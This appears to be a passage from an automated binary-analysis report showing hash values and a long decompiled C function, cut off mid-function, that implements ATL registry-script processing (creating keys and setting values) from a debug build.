                      • Opcode Fuzzy Hash: 0d0b220e0f8b09586a73f43e3fdcb49fc1c40617df8914d65be43f83bf70a7d6
                      • Instruction Fuzzy Hash: C27165B0D44118AFDB08DFE5D8A1AFEBBB5BF88301F108169F41AA7255DB30AA45CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009486D0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 411COMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E009486D0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v57;
				signed int _v64;
				char _v72;
				signed int _v84;
				signed int _v96;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				char _v124;
				signed int _v136;
				signed int _v156;
				char _v168;
				signed int _v180;
				char _v192;
				signed int _v200;
				signed int _v201;
				signed int _v220;
				signed int _v240;
				signed int _v252;
				signed int _v264;
				signed int _v284;
				signed int _v289;
				signed int _v308;
				signed int _v328;
				signed int _v340;
				signed int _v352;
				signed int _v360;
				signed int _v364;
				char _v1396;
				signed int _v1404;
				CHAR* _v1408;
				CHAR* _v1412;
				signed int _v1428;
				signed int _v1433;
				signed int _v1452;
				signed int _v1472;
				signed int _v1484;
				signed int _v1496;
				signed int _v1508;
				char _v1520;
				signed int _v1540;
				signed int _v1545;
				void _v1564;
				signed int _v1584;
				void _v1596;
				signed int _v1608;
				signed int _v1620;
				char _v2656;
				signed int _v2668;
				signed int _v2676;
				signed int _v2680;
				signed int _v2696;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				intOrPtr _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				intOrPtr _v2736;
				intOrPtr _v2740;
				intOrPtr _v2744;
				char _v2752;
				char _v2760;
				intOrPtr _v2764;
				intOrPtr _v2768;
				intOrPtr _v2772;
				intOrPtr _v2776;
				char _v2784;
				char _v2792;
				intOrPtr _v2796;
				intOrPtr _v2800;
				intOrPtr _v2804;
				char _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				void _v2908;
				signed int _t754;
				signed int _t755;
				signed int _t769;
				void* _t775;
				signed int _t783;
				signed int _t805;
				signed int _t807;
				signed int _t817;
				void* _t818;
				intOrPtr _t820;

				_push(0xffffffff);
				_push(0x9d4ec4);
				_push( *[fs:0x0]);
				memset( &_v2908, 0xcccccccc, 0x2d2 << 2);
				_t820 = _t818 - 0xb48 + 0xc;
				_pop(_t783);
				_t754 =  *0xa0600c; // 0x5d529087
				_t755 = _t754 ^ _t817;
				_v24 = _t755;
				_push(_t755);
				 *[fs:0x0] =  &_v16;
				_v20 = _t820;
				_v28 = _t783;
				E009441C0( &_v44, 0);
				_v8 = 0;
				_v52 = 0;
				_v56 = 0;
				_v57 = 0;
				_v64 = 0;
				_v104 = 0;
				_v108 = E00941AB0();
				_v112 = 0;
				_v116 = 0;
				E0094F2E0( &_v124);
				_v8 = 1;
				_t805 =  *( *_a8);
				E0094A0F0(_v28, _t805,  &_v72,  &_v84,  &_v96);
				while(_v72 != 6) {
					_v2820 = _v72;
					if(_v2820 > 0xb) {
						_t805 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t775 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x31a, 0, "%ls", 0x9f40dc);
							_t820 = _t820 + 0x18;
							__eflags = _t775 - 1;
							if(_t775 == 1) {
								asm("int3");
							}
						}
						L204:
						continue;
					}
					switch( *((intOrPtr*)(_v2820 * 4 +  &M0094A0BC))) {
						case 0:
							_v2704 = 0;
							_v8 = 0;
							E0094F220( &_v124);
							_v8 = 0xffffffff;
							E00944220( &_v44, _t824);
							_t769 = _v2704;
							goto L206;
						case 1:
							_v57 = 1;
							__eflags = _a24;
							if(__eflags == 0) {
								L8:
								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__eax = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx =  &_v96;
								__edx =  &_v84;
								__eax =  &_v72;
								__ecx = _a8;
								__edx =  *_a8;
								__eax =  *( *_a8);
								__ecx = _v28;
								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							__edx = _a12;
							__eax = _v84;
							__ecx =  &_v44;
							__edx = _a4;
							__ecx = _v28;
							_v56 = E00948580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
							__eflags = _v56;
							if(_v56 >= 0) {
								goto L8;
							} else {
								__eax = _v56;
								_v2708 = _v56;
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E0094F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00944220(__ecx, __eflags) = _v2708;
								goto L206;
							}
						case 2:
							__eflags = _a24;
							if(__eflags == 0) {
								goto L12;
							}
							__ecx = _a12;
							__edx = _v84;
							__eax = _a4;
							__ecx = _v28;
							_v56 = E009483D0(__ebx, _v28, __edi, __esi, __eflags, _a4, _v84, _a12);
							__eflags = _v56;
							if(_v56 >= 0) {
								goto L12;
							}
							__ecx = _v56;
							_v2712 = _v56;
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E0094F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00944220(__ecx, __eflags) = _v2712;
							goto L206;
						case 3:
							L12:
							__eflags = _a24;
							if(__eflags != 0) {
								__eax = _a12;
								__ecx = _v84;
								__edx =  &_v44;
								__eax = _a4;
								__ecx = _v28;
								_v56 = E00948580(__ebx, _v28, __edi, __esi, __eflags, _a4,  &_v44, _v84, _a12);
								__eflags = _v56;
								if(_v56 >= 0) {
									L26:
									__edx = _a8;
									 *_a8 =  *_a8 + 4;
									__ecx = _a8;
									 *_a8 =  *_a8 + 4;
									__edx =  &_v96;
									__eax =  &_v84;
									__ecx =  &_v72;
									__edx = _a8;
									__eax =  *_a8;
									__ecx =  *( *_a8);
									__ecx = _v28;
									__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
									goto L204;
								}
								__ecx = _v56;
								_v2724 = _v56;
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E0094F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00944220(__ecx, __eflags) = _v2724;
								goto L206;
							}
							_v136 = 0;
							__ecx =  &_v156;
							__eax = E0094E200( &_v156);
							__edx =  &_v136;
							__eax =  &_v156;
							__ecx = _v84;
							__edx = _a12;
							__ecx = _v28;
							_v56 = E00948100(__ebx, __ecx, _a12, __edi, __esi, _a12, _v84,  &_v156,  &_v136);
							__eflags = _v56;
							if(__eflags >= 0) {
								_v52 = 2;
								__eflags = _a4;
								if(_a4 != 0) {
									__eflags = _v136;
									if(_v136 == 0) {
										__edx = _v156;
										_v2824 = _v156;
									} else {
										__ecx = _v136;
										_v2824 = _v136;
									}
									__eax = _v2824;
									__ecx = _a4;
									__ecx =  &_v44;
									_v52 = E009445F0(__ecx, __esi, _a4, _v2824, 0x2001f);
								}
								__eflags = _v52;
								if(__eflags == 0) {
									L23:
									__eax = _a8;
									__ecx =  *_a8;
									__edx =  *( *_a8);
									_v64 =  *( *_a8);
									__ecx =  &_v156;
									__eax = L00951F30( &_v156, __eflags);
									goto L26;
								} else {
									__eflags = _v52 - 2;
									if(__eflags == 0) {
										goto L23;
									}
									__edx = _v52;
									_v2720 = E00942E00(__ecx, __eflags, _v52);
									__ecx =  &_v156;
									__eax = L00951F30( &_v156, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E0094F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00944220(__ecx, __eflags) = _v2720;
									goto L206;
								}
							}
							__eax = _v56;
							_v2716 = _v56;
							__ecx =  &_v156;
							__eax = L00951F30( &_v156, __eflags);
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E0094F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00944220(__ecx, __eflags) = _v2716;
							goto L206;
						case 4:
							__edx = 0;
							__eflags = 0;
							if(0 == 0) {
								__eax = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x211, 0, "%ls", 0x9f40dc);
								__eflags = __eax - 1;
								if(__eax == 1) {
									asm("int3");
								}
							}
							goto L204;
						case 5:
							__ecx = _a8;
							 *_a8 =  *_a8 + 4;
							__eax = _a8;
							 *_a8 =  *_a8 + 4;
							__ecx = _a24;
							__edx = _a20;
							__eax = _a16;
							__ecx = _a12;
							__edx = _a8;
							__eax = _v44;
							__ecx = _v28;
							_v56 = E009486D0(__ebx, _v28, __edi, __esi, _v44, _a8, _a12, _a16, _a20, _a24);
							__eflags = _v56;
							if(_v56 >= 0) {
								__edx =  &_v96;
								__eax =  &_v84;
								__ecx =  &_v72;
								__edx = _a8;
								__eax =  *_a8;
								__ecx =  *( *_a8);
								__ecx = _v28;
								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								__eflags = _a24;
								if(_a24 != 0) {
									L39:
									goto L204;
								}
								__edx = _v57 & 0x000000ff;
								__eflags = _v57 & 0x000000ff;
								if((_v57 & 0x000000ff) != 0) {
									_v57 = 0;
									goto L39;
								}
								__eax =  &_v192;
								__ecx =  &_v180;
								__edx =  &_v168;
								__eax = _v64;
								__ecx = _v28;
								__eax = E0094A0F0(_v28, _v64,  &_v168,  &_v180,  &_v192);
								__ecx = _a12;
								__edx = _v180;
								__eax = _a4;
								__ecx = _v28;
								_v56 = E009483D0(__ebx, __ecx, __edi, __esi, __eflags, _a4, _v180, _a12);
								__eflags = _v56;
								if(_v56 >= 0) {
									goto L39;
								}
								__ecx = _v56;
								_v2732 = _v56;
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E0094F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00944220(__ecx, __eflags) = _v2732;
								goto L206;
							}
							__ecx = _v56;
							_v2728 = _v56;
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E0094F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00944220(__ecx, __eflags) = _v2728;
							goto L206;
						case 6:
							__edx = 0;
							__eflags = 0;
							if(0 == 0) {
								__eax = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x228, 0, 0x9f40e0, 0x9f40dc);
								__eflags = __eax - 1;
								if(__eax == 1) {
									asm("int3");
								}
							}
							_v2736 = 0x80004005;
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E0094F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00944220(__ecx, __eflags) = _v2736;
							goto L206;
						case 7:
							_v84 = _v84 | 0x80000000;
							_v200 = _v84 | 0x80000000;
							__edx = _a8;
							 *_a8 =  *_a8 + 4;
							__ecx = _a8;
							 *_a8 =  *_a8 + 4;
							__edx = _a24;
							__eax = _a20;
							__ecx = _a16;
							__edx = _a12;
							__eax = _a8;
							__ecx = _v200;
							__ecx = _v28;
							_v2740 = E009486D0(__ebx, _v28, __edi, __esi, _v200, _a8, _a12, _a16, _a20, _a24);
							_v8 = 0;
							__ecx =  &_v124;
							__eax = E0094F220( &_v124);
							_v8 = 0xffffffff;
							__ecx =  &_v44;
							E00944220(__ecx, __eflags) = _v2740;
							goto L206;
						case 8:
							__eflags = _a24;
							if(_a24 == 0) {
								L77:
								__edx = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__edx =  &_v96;
								__eax =  &_v84;
								__ecx =  &_v72;
								__edx = _a8;
								__eax =  *_a8;
								__ecx =  *( *_a8);
								__ecx = _v28;
								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v201 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__edx = _a4;
								_v44 = _a4;
								_v201 = 1;
							}
							__ecx =  &_v220;
							__eax = E0094E200( &_v220);
							_v8 = 2;
							__ecx =  &_v240;
							__eax = E0094E200( &_v240);
							_v8 = 3;
							_v252 = 0;
							_v264 = 0;
							__eax =  &_v252;
							__ecx =  &_v220;
							__edx = _v96;
							__eax = _a12;
							__ecx = _v28;
							_v56 = E00948100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v220,  &_v252);
							__eflags = _v56;
							if(_v56 >= 0) {
								__eflags = _v84;
								if(_v84 != 0) {
									__ecx =  &_v264;
									__edx =  &_v240;
									__eax = _v84;
									__ecx = _a12;
									__ecx = _v28;
									_v56 = E00948100(__ebx, _v28,  &_v240, __edi, __esi, _a12, _v84,  &_v240,  &_v264);
								}
							}
							__ecx =  &_v284;
							__eax = E009441C0( &_v284, 0);
							_v8 = 4;
							__eflags = _v84;
							if(_v84 != 0) {
								__eax = _a4;
								_v284 = _a4;
							} else {
								__edx = _v44;
								_v284 = _v44;
							}
							__eflags = _v252;
							if(_v252 == 0) {
								__edx = _v220;
								_v2828 = _v220;
							} else {
								__ecx = _v252;
								_v2828 = _v252;
							}
							__eflags = _v84;
							if(_v84 == 0) {
								_v2836 = 0;
							} else {
								__eflags = _v264;
								if(_v264 == 0) {
									__ecx = _v240;
									_v2832 = _v240;
								} else {
									__eax = _v264;
									_v2832 = _v264;
								}
								__edx = _v2832;
								_v2836 = _v2832;
							}
							__eax = _v2828;
							__ecx = _v2836;
							__ecx =  &_v284;
							_v52 = E00944840(__ecx, __esi, _v2836, _v2828, 1);
							_v284 = 0;
							__eflags = _v52;
							if(__eflags == 0) {
								__eax = _v201 & 0x000000ff;
								__eflags = _v201 & 0x000000ff;
								if((_v201 & 0x000000ff) != 0) {
									_v44 = 0;
								}
								__eflags = _v84;
								if(_v84 == 0) {
									_v2844 = "default";
								} else {
									__eflags = _v264;
									if(_v264 == 0) {
										__edx = _v240;
										_v2840 = _v240;
									} else {
										__ecx = _v264;
										_v2840 = _v264;
									}
									__eax = _v2840;
									_v2844 = _v2840;
								}
								__eflags = _v252;
								if(__eflags == 0) {
									__edx = _v220;
									_v2848 = _v220;
								} else {
									__ecx = _v252;
									_v2848 = _v252;
								}
								__eax = _v2844;
								_push(_v2844);
								__ecx = _v2848;
								__ecx = 0xb337ac;
								__eax = E0094F1F0(0xb337ac);
								__ecx =  &_v2752;
								E009423B0( &_v2752, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x24e) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2848);
								_v8 = 3;
								__ecx =  &_v284;
								__eax = E00944220( &_v284, __eflags);
								_v8 = 2;
								__ecx =  &_v240;
								__eax = L00951F30( &_v240, __eflags);
								_v8 = 1;
								__ecx =  &_v220;
								__eax = L00951F30( &_v220, __eflags);
								goto L77;
							} else {
								__edx = _v52;
								_v2744 = E00942E00(__ecx, __eflags, _v52);
								_v8 = 3;
								__ecx =  &_v284;
								__eax = E00944220( &_v284, __eflags);
								_v8 = 2;
								__ecx =  &_v240;
								__eax = L00951F30( &_v240, __eflags);
								_v8 = 1;
								__ecx =  &_v220;
								__eax = L00951F30( &_v220, __eflags);
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E0094F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00944220(__ecx, __eflags) = _v2744;
								goto L206;
							}
						case 9:
							__eflags = _a24;
							if(_a24 == 0) {
								L126:
								__eax = _a8;
								 *_a8 =  *_a8 + 4;
								__edx = _a8;
								 *_a8 =  *_a8 + 4;
								__eax =  &_v96;
								__ecx =  &_v84;
								__edx =  &_v72;
								__eax = _a8;
								__ecx =  *_a8;
								__edx =  *( *_a8);
								__ecx = _v28;
								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v289 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__edx = _a4;
								_v44 = _a4;
								_v289 = 1;
							}
							__ecx =  &_v308;
							__eax = E0094E200( &_v308);
							_v8 = 5;
							__ecx =  &_v328;
							__eax = E0094E200( &_v328);
							_v8 = 6;
							_v340 = 0;
							_v352 = 0;
							__eax =  &_v340;
							__ecx =  &_v308;
							__edx = _v96;
							__eax = _a12;
							__ecx = _v28;
							_v56 = E00948100(__ebx, _v28, _v96, __edi, __esi, _a12, _v96,  &_v308,  &_v340);
							__eflags = _v56;
							if(_v56 >= 0) {
								__eflags = _v84;
								if(_v84 != 0) {
									__ecx =  &_v352;
									__edx =  &_v328;
									__eax = _v84;
									__ecx = _a12;
									__ecx = _v28;
									_v56 = E00948100(__ebx, _v28,  &_v328, __edi, __esi, _a12, _v84,  &_v328,  &_v352);
								}
							}
							__eflags = _v84;
							if(_v84 == 0) {
								_v2856 = "default";
							} else {
								__eflags = _v352;
								if(_v352 == 0) {
									__eax = _v328;
									_v2852 = _v328;
								} else {
									__edx = _v352;
									_v2852 = _v352;
								}
								__ecx = _v2852;
								_v2856 = _v2852;
							}
							__eflags = _v340;
							if(__eflags == 0) {
								__eax = _v308;
								_v2860 = _v308;
							} else {
								__edx = _v340;
								_v2860 = _v340;
							}
							__ecx = _v2856;
							_push(_v2856);
							__edx = _v2860;
							__ecx = 0xb337ac;
							__eax = E0094F1F0(0xb337ac);
							__ecx =  &_v2760;
							E009423B0( &_v2760, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x265) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2860);
							__eflags = _v340;
							if(_v340 == 0) {
								__ecx = _v308;
								_v2864 = _v308;
							} else {
								__eax = _v340;
								_v2864 = _v340;
							}
							__edx = _v2864;
							_v360 = _v2864;
							__eax = _v360;
							__eax = E00992E00(_v360);
							_v364 = __eax;
							__ecx =  &_v1396;
							__eax = E0094EAC0( &_v1396);
							_v8 = 7;
							_v8 = 8;
							__ecx = _v364;
							__ecx =  &_v1396;
							__eax = E0094EA30(__ebx,  &_v1396, __eflags, _v364);
							_v8 = 7;
							__ecx =  &_v1396;
							__eax = E0094EA70( &_v1396);
							__eflags = __eax;
							if(__eax == 0) {
								_v2768 = 0x8007000e;
								_v8 = 6;
								__ecx =  &_v1396;
								__eax = E0094EA80( &_v1396);
								_v8 = 5;
								__ecx =  &_v328;
								__eax = L00951F30( &_v328, __eflags);
								_v8 = 1;
								__ecx =  &_v308;
								__eax = L00951F30( &_v308, __eflags);
								_v8 = 0;
								__ecx =  &_v124;
								__eax = E0094F220( &_v124);
								_v8 = 0xffffffff;
								__ecx =  &_v44;
								E00944220(__ecx, __eflags) = _v2768;
								goto L206;
							} else {
								__ecx =  &_v1396;
								_v1404 = E0094EA70( &_v1396);
								__edx = _v360;
								_v1408 = _v360;
								_v364 = 0;
								while(1) {
									__eax = _v1408;
									__ecx =  *_v1408;
									__eflags =  *_v1408;
									if( *_v1408 == 0) {
										break;
									}
									__esi = __esp;
									__edx = _v1408;
									__eax = CharNextA(_v1408);
									__eflags = __esp - __esp;
									_v1412 = __eax;
									__eax = _v1408;
									__ecx =  *_v1408;
									__eflags =  *_v1408 - 0x5c;
									if( *_v1408 != 0x5c) {
										L104:
										__ecx = _v1404;
										__edx = _v1408;
										__al =  *_v1408;
										 *_v1404 = __al;
										__esi = __esp;
										__ecx = _v1408;
										__edx =  *_v1408 & 0x000000ff;
										__eax = IsDBCSLeadByte( *_v1408 & 0x000000ff);
										__eflags = __esi - __esp;
										__eax = E009D1520(__eax, __esi - __esp);
										__eflags = __eax;
										if(__eax == 0) {
											L108:
											_v1404 = _v1404 + 1;
											_v1404 = _v1404 + 1;
											__edx = _v1408;
											__edx =  &(_v1408[1]);
											__eflags = __edx;
											_v1408 = __edx;
											L109:
											_v364 = _v364 + 1;
											_v364 = _v364 + 1;
											continue;
										}
										_v1404 = _v1404 + 1;
										_v1404 = _v1404 + 1;
										_v1408 =  &(_v1408[1]);
										_v1408 =  &(_v1408[1]);
										__edx = _v1408;
										__eax =  *_v1408;
										__eflags =  *_v1408;
										if( *_v1408 != 0) {
											__ecx = _v1404;
											__edx = _v1408;
											__al =  *_v1408;
											 *_v1404 = __al;
											goto L108;
										}
										break;
									}
									__edx = _v1412;
									__eax =  *_v1412;
									__eflags =  *_v1412 - 0x30;
									if( *_v1412 != 0x30) {
										goto L104;
									}
									__ecx = _v1404;
									 *_v1404 = 0;
									_v1404 = _v1404 + 1;
									_v1404 = _v1404 + 1;
									__esi = __esp;
									__eax = _v1412;
									__eax = CharNextA(_v1412);
									__eflags = __esi - __esp;
									_v1408 = __eax;
									goto L109;
								}
								__ecx = _v1404;
								 *_v1404 = 0;
								_v1404 = _v1404 + 1;
								_v1404 = _v1404 + 1;
								__eax = _v1404;
								 *_v1404 = 0;
								__ecx =  &_v1428;
								__eax = E009441C0( &_v1428, 0);
								__eflags = _v84;
								if(_v84 != 0) {
									__edx = _a4;
									_v1428 = _a4;
								} else {
									__ecx = _v44;
									_v1428 = _v44;
								}
								__eflags = _v84;
								if(_v84 == 0) {
									_v2872 = 0;
								} else {
									__eflags = _v352;
									if(_v352 == 0) {
										__ecx = _v328;
										_v2868 = _v328;
									} else {
										__eax = _v352;
										_v2868 = _v352;
									}
									__edx = _v2868;
									_v2872 = _v2868;
								}
								__ecx =  &_v1396;
								E0094EA70( &_v1396) = _v2872;
								__ecx =  &_v1428;
								_v52 = E00944960( &_v1428, __esi, _v2872, _v2872);
								_v1428 = 0;
								__eflags = _v52;
								if(__eflags == 0) {
									__edx = _v289 & 0x000000ff;
									__eflags = _v289 & 0x000000ff;
									if(__eflags != 0) {
										_v44 = 0;
									}
									__ecx =  &_v1428;
									__eax = E00944220( &_v1428, __eflags);
									_v8 = 6;
									__ecx =  &_v1396;
									__eax = E0094EA80( &_v1396);
									_v8 = 5;
									__ecx =  &_v328;
									__eax = L00951F30( &_v328, __eflags);
									_v8 = 1;
									__ecx =  &_v308;
									__eax = L00951F30( &_v308, __eflags);
									goto L126;
								} else {
									__ecx = _v52;
									_v2764 = E00942E00(_v52, __eflags, _v52);
									__ecx =  &_v1428;
									__eax = E00944220( &_v1428, __eflags);
									_v8 = 6;
									__ecx =  &_v1396;
									__eax = E0094EA80( &_v1396);
									_v8 = 5;
									__ecx =  &_v328;
									__eax = L00951F30( &_v328, __eflags);
									_v8 = 1;
									__ecx =  &_v308;
									__eax = L00951F30( &_v308, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E0094F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00944220(__ecx, __eflags) = _v2764;
									goto L206;
								}
							}
						case 0xa:
							__eflags = _a24;
							if(_a24 == 0) {
								L160:
								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__eax = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx =  &_v96;
								__edx =  &_v84;
								__eax =  &_v72;
								__ecx = _a8;
								__edx =  *_a8;
								__eax =  *( *_a8);
								__ecx = _v28;
								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v1433 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__eax = _a4;
								_v44 = _a4;
								_v1433 = 1;
							}
							__ecx =  &_v1452;
							__eax = E0094E200( &_v1452);
							_v8 = 0xa;
							__ecx =  &_v1472;
							__eax = E0094E200( &_v1472);
							_v8 = 0xb;
							_v1484 = 0;
							_v1496 = 0;
							__ecx =  &_v1508;
							__edx = _v96;
							__eax = _a16;
							__ecx = _v28;
							_v56 = E00948330(_v28, _a16, _v96,  &_v1508);
							__eflags = _v56 - 1;
							if(_v56 != 1) {
								L137:
								__eflags = _v56;
								if(_v56 >= 0) {
									__eflags = _v84;
									if(_v84 != 0) {
										__eax =  &_v1496;
										__ecx =  &_v1472;
										__edx = _v84;
										__eax = _a12;
										__ecx = _v28;
										_v56 = E00948100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1472,  &_v1496);
									}
								}
								__ecx =  &_v1540;
								__eax = E009441C0( &_v1540, 0);
								_v8 = 0xc;
								__eflags = _v84;
								if(_v84 != 0) {
									__edx = _a4;
									_v1540 = _a4;
								} else {
									__ecx = _v44;
									_v1540 = _v44;
								}
								__eflags = _v1496;
								if(_v1496 == 0) {
									__ecx = _v1472;
									_v2880 = _v1472;
								} else {
									__eax = _v1496;
									_v2880 = _v1496;
								}
								__edx = _v1508;
								__eax = _v2880;
								__ecx =  &_v1540;
								_v52 = E009447C0( &_v1540, __esi, _v2880, _v1508);
								_v1540 = 0;
								__eflags = _v52;
								if(__eflags == 0) {
									__edx = _v1433 & 0x000000ff;
									__eflags = _v1433 & 0x000000ff;
									if((_v1433 & 0x000000ff) != 0) {
										_v44 = 0;
									}
									__eflags = _v84;
									if(_v84 == 0) {
										_v2888 = "default";
									} else {
										__eflags = _v1496;
										if(_v1496 == 0) {
											__ecx = _v1472;
											_v2884 = _v1472;
										} else {
											__eax = _v1496;
											_v2884 = _v1496;
										}
										__edx = _v2884;
										_v2888 = _v2884;
									}
									__eflags = _v1484;
									if(__eflags == 0) {
										__ecx = _v1452;
										_v2892 = _v1452;
									} else {
										__eax = _v1484;
										_v2892 = _v1484;
									}
									__edx = _v2888;
									_push(_v2888);
									__eax = _v2892;
									__ecx = 0xb337ac;
									__eax = E0094F1F0(0xb337ac);
									__ecx =  &_v2784;
									E009423B0( &_v2784, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2d2) = E009423E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2892);
									_v8 = 0xb;
									__ecx =  &_v1540;
									__eax = E00944220( &_v1540, __eflags);
									_v8 = 0xa;
									__ecx =  &_v1472;
									__eax = L00951F30( &_v1472, __eflags);
									_v8 = 1;
									__ecx =  &_v1452;
									__eax = L00951F30( &_v1452, __eflags);
									goto L160;
								} else {
									__ecx = _v52;
									_v2776 = E00942E00(_v52, __eflags, _v52);
									_v8 = 0xb;
									__ecx =  &_v1540;
									__eax = E00944220( &_v1540, __eflags);
									_v8 = 0xa;
									__ecx =  &_v1472;
									__eax = L00951F30( &_v1472, __eflags);
									_v8 = 1;
									__ecx =  &_v1452;
									__eax = L00951F30( &_v1452, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E0094F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00944220(__ecx, __eflags) = _v2776;
									goto L206;
								}
							} else {
								__ecx =  &_v1484;
								__edx =  &_v1452;
								__eax = _v1508;
								__ecx = _a12;
								__ecx = _v28;
								__eax = E00948100(__ebx, _v28,  &_v1452, __edi, __esi, _a12, _v1508,  &_v1452,  &_v1484);
								__eflags = _v1484;
								if(__eflags == 0) {
									__eax = _v1452;
									_v2876 = _v1452;
								} else {
									__edx = _v1484;
									_v2876 = _v1484;
								}
								__ecx = _v2876;
								__ecx =  &_v1520;
								__eax = E0094E4E0(__ebx,  &_v1520, __eflags, _v2876);
								__esi = __esp;
								__edx =  &_v1508;
								_push( &_v1508);
								_push(0);
								_push(0);
								__ecx =  &_v1520;
								__eax = E0094E570( &_v1520);
								_push(__eax);
								__imp__#277();
								__eflags = __esi - __esp;
								_v56 = __eax;
								__eflags = _v56;
								if(__eflags >= 0) {
									__ecx =  &_v1520;
									__eax = E0094E4B0( &_v1520, __eflags);
									goto L137;
								} else {
									_v2772 = 0x80004005;
									__ecx =  &_v1520;
									__eax = E0094E4B0( &_v1520, __eflags);
									_v8 = 0xa;
									__ecx =  &_v1472;
									__eax = L00951F30( &_v1472, __eflags);
									_v8 = 1;
									__ecx =  &_v1452;
									__eax = L00951F30( &_v1452, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E0094F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00944220(__ecx, __eflags) = _v2772;
									goto L206;
								}
							}
						case 0xb:
							__eflags = _a24;
							if(_a24 == 0) {
								L200:
								__edx = _a8;
								 *_a8 =  *_a8 + 4;
								__ecx = _a8;
								 *_a8 =  *_a8 + 4;
								__edx =  &_v96;
								__eax =  &_v84;
								__ecx =  &_v72;
								__edx = _a8;
								__eax =  *_a8;
								__ecx =  *( *_a8);
								__ecx = _v28;
								__eax = E0094A0F0(__ecx,  *( *_a8),  &_v72,  &_v84,  &_v96);
								goto L204;
							}
							_v1545 = 0;
							__eflags = _v44;
							if(_v44 == 0) {
								__ecx = _a4;
								_v44 = _a4;
								_v1545 = 1;
							}
							__ecx =  &_v1564;
							__eax = E0094E200( &_v1564);
							_v8 = 0xd;
							__ecx =  &_v1584;
							__eax = E0094E200( &_v1584);
